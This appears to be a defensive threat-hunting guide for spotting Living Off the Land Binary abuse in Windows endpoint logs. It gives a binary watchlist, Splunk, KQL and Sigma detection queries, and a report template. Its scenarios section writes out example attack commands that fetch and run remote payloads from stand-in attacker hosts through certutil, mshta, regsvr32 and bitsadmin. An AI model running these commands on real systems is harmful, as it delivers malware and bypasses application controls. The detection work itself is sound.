\title{Hunting For Lolbins Execution In Endpoint Logs}

\taxon{skill}

\tag{threat-hunting}

\tag{lolbins}

\tag{living-off-the-land}

\tag{endpoint-detection}

\tag{process-monitoring}

\tag{mitre-t1218}

\tag{defense-evasion}

\meta{version}{"1.0"}

\meta{description}{Hunt for adversary abuse of Living Off the Land Binaries (LOLBins) by analyzing endpoint process creation logs for suspicious execution patterns of legitimate Windows system binaries used for malicious purposes.}

\subtree{
\title{Hunting for LOLBins Execution in Endpoint Logs}
\subtree{
\title{When to Use}
\ul{
\li{When hunting for fileless attack techniques that abuse built-in Windows binaries}
\li{After threat intelligence indicates LOLBin-based campaigns targeting your industry}
\li{When investigating alerts for suspicious use of certutil, mshta, rundll32, or regsvr32}
\li{During purple team exercises testing detection of defense evasion techniques}
\li{When assessing endpoint detection coverage for MITRE ATT&CK T1218 sub-techniques}
}
}

\subtree{
\title{Prerequisites}
\ul{
\li{Sysmon Event ID 1 (Process Creation) with full command-line logging}
\li{Windows Security Event ID 4688 with command-line auditing enabled}
\li{EDR telemetry with parent-child process relationships}
\li{SIEM platform for query and correlation (Splunk, Elastic, Microsoft Sentinel)}
\li{LOLBAS project reference (lolbas-project.github.io) for known abuse patterns}
}
}

\subtree{
\title{Workflow}
\ol{
\li{\strong{Build LOLBin Watchlist}: Compile a list of high-risk LOLBins from the LOLBAS project, prioritizing: certutil.exe, mshta.exe, rundll32.exe, regsvr32.exe, msbuild.exe, installutil.exe, cmstp.exe, wmic.exe, wscript.exe, cscript.exe, bitsadmin.exe, and powershell.exe.}
\li{\strong{Baseline Normal Usage}: Establish what normal LOLBin usage looks like in your environment by profiling command-line arguments, parent processes, and user contexts for each binary over 30 days.}
\li{\strong{Hunt for Anomalous Arguments}: Search for LOLBins executed with unusual command-line arguments indicating abuse -- certutil with \code{\startverb -urlcache -decode -encode\stopverb}, mshta with URL arguments, rundll32 loading DLLs from temp/user directories, regsvr32 with \code{\startverb /s /n /u /i:URL\stopverb}.}
\li{\strong{Analyze Parent-Child Relationships}: Identify unexpected parent processes spawning LOLBins -- for example, outlook.exe spawning mshta.exe, or winword.exe spawning certutil.exe indicates weaponized document delivery.}
\li{\strong{Check Execution from Unusual Paths}: LOLBins executed from non-standard paths (copies placed in \%TEMP\%, user profile directories) suggest renamed binary abuse.}
\li{\strong{Correlate with Network Activity}: Map LOLBin execution to outbound network connections (Sysmon Event ID 3) to identify download cradles and C2 callbacks.}
\li{\strong{Score and Prioritize}: Rank findings by anomaly severity, combining suspicious arguments, unusual parent process, non-standard path, and network activity indicators.}
}
}

\subtree{
\title{Key Concepts}
\pre{\startverb
| Concept | Description |
|---------|-------------|
| T1218 | System Binary Proxy Execution |
| T1218.001 | Compiled HTML File (mshta.exe) |
| T1218.003 | CMSTP |
| T1218.005 | Mshta |
| T1218.010 | Regsvr32 (Squiblydoo) |
| T1218.011 | Rundll32 |
| T1127.001 | MSBuild |
| T1197 | BITS Jobs (bitsadmin.exe) |
| T1140 | Deobfuscate/Decode Files (certutil.exe) |
| T1059.001 | PowerShell |
| T1059.005 | Visual Basic (wscript/cscript) |
| LOLBAS | Living Off the Land Binaries, Scripts and Libraries project |
\stopverb}
}

\subtree{
\title{Tools & Systems}
\pre{\startverb
| Tool | Purpose |
|------|---------|
| Sysmon | Process creation with command-line and hash logging |
| CrowdStrike Falcon | EDR with LOLBin detection analytics |
| Microsoft Defender for Endpoint | Built-in LOLBin abuse detection |
| Splunk | SPL-based process hunting and anomaly detection |
| Elastic Security | Pre-built LOLBin detection rules |
| LOLBAS Project | Reference database of LOLBin abuse techniques |
| Sigma Rules | Community detection rules for LOLBin abuse |
\stopverb}
}

\subtree{
\title{Detection Queries}
\subtree{
\title{Splunk -- High-Risk LOLBin Execution}
\pre{\startverb
index=sysmon EventCode=1
| where match(Image, "(?i)(certutil|mshta|rundll32|regsvr32|msbuild|installutil|cmstp|bitsadmin)\.exe$")
| eval suspicious=case(
    match(CommandLine, "(?i)certutil.*(-urlcache|-decode|-encode)"), "certutil_download_decode",
    match(CommandLine, "(?i)mshta.*(http|https|javascript|vbscript)"), "mshta_remote_exec",
    match(CommandLine, "(?i)rundll32.*\\\\(temp|appdata|users)"), "rundll32_unusual_dll",
    match(CommandLine, "(?i)regsvr32.*/s.*/n.*/u.*/i:"), "regsvr32_squiblydoo",
    match(CommandLine, "(?i)msbuild.*\\\\(temp|appdata|users)"), "msbuild_unusual_project",
    match(CommandLine, "(?i)bitsadmin.*/transfer"), "bitsadmin_download",
    match(CommandLine, "(?i)cmstp.*/s.*/ni"), "cmstp_uac_bypass",
    1=1, "normal"
)
| where suspicious!="normal"
| table _time Computer User Image CommandLine ParentImage ParentCommandLine suspicious
\stopverb}
}

\subtree{
\title{KQL -- Microsoft Sentinel LOLBin Hunting}
\pre{\startverb
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
    "msbuild.exe", "installutil.exe", "cmstp.exe", "bitsadmin.exe")
| where ProcessCommandLine matches regex @"(?i)(urlcache|decode|encode|http://|https://|javascript:|vbscript:|/s\s+/n|/transfer)"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
\stopverb}
}

\subtree{
\title{Sigma Rule -- Suspicious LOLBin Command Line}
\pre{\startverb
title: Suspicious LOLBin Execution with Malicious Arguments
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection_certutil:
        Image|endswith: '\certutil.exe'
        CommandLine|contains:
            - '-urlcache'
            - '-decode'
            - '-encode'
    selection_mshta:
        Image|endswith: '\mshta.exe'
        CommandLine|contains:
            - 'http://'
            - 'https://'
            - 'javascript:'
    selection_regsvr32:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains|all:
            - '/s'
            - '/i:'
    condition: 1 of selection_*
level: high
tags:
    - attack.defense_evasion
    - attack.t1218
\stopverb}
}
}

\subtree{
\title{Common Scenarios}
\ol{
\li{\strong{Certutil Download Cradle}: \code{\startverb certutil.exe -urlcache -split -f http://malicious.com/payload.exe \%TEMP\%\startverb \payload\stopverb.exe\stopverb} used to download malware bypassing proxy filters.}
\li{\strong{Mshta HTA Execution}: \code{\startverb mshta.exe http://attacker.com/malicious.hta\stopverb} executing remote HTA files containing VBScript or JScript payloads.}
\li{\strong{Regsvr32 Squiblydoo}: \code{\startverb regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll\stopverb} executing remote SCT files to bypass application whitelisting.}
\li{\strong{Rundll32 DLL Proxy}: \code{\startverb rundll32.exe C:\startverb \Users\stopverb\startverb \user\stopverb\startverb \AppData\stopverb\startverb \Local\stopverb\startverb \Temp\stopverb\startverb \malicious\stopverb.dll,EntryPoint\stopverb} executing attacker DLLs via legitimate binary.}
\li{\strong{MSBuild Inline Task}: \code{\startverb msbuild.exe C:\startverb \Temp\stopverb\startverb \malicious\stopverb.csproj\stopverb} executing C# code embedded in project files to bypass application control.}
\li{\strong{BITS Transfer}: \code{\startverb bitsadmin /transfer job /download /priority high http://attacker.com/malware.exe C:\startverb \Temp\stopverb\startverb \update\stopverb.exe\stopverb} using BITS service for stealthy file download.}
\li{\strong{WMIC XSL Execution}: \code{\startverb wmic process list /format:evil.xsl\stopverb} executing JScript/VBScript from XSL stylesheets.}
}
}

\subtree{
\title{Output Format}
\pre{\startverb
Hunt ID: TH-LOLBIN-[DATE]-[SEQ]
Host: [Hostname]
User: [Account context]
LOLBin: [Binary name]
Full Path: [Execution path]
Command Line: [Full arguments]
Parent Process: [Parent image and command line]
Detection Category: [download_cradle/proxy_exec/uac_bypass/applocker_bypass]
Network Activity: [Yes/No -- destination if applicable]
Risk Level: [Critical/High/Medium/Low]
\stopverb}
}
}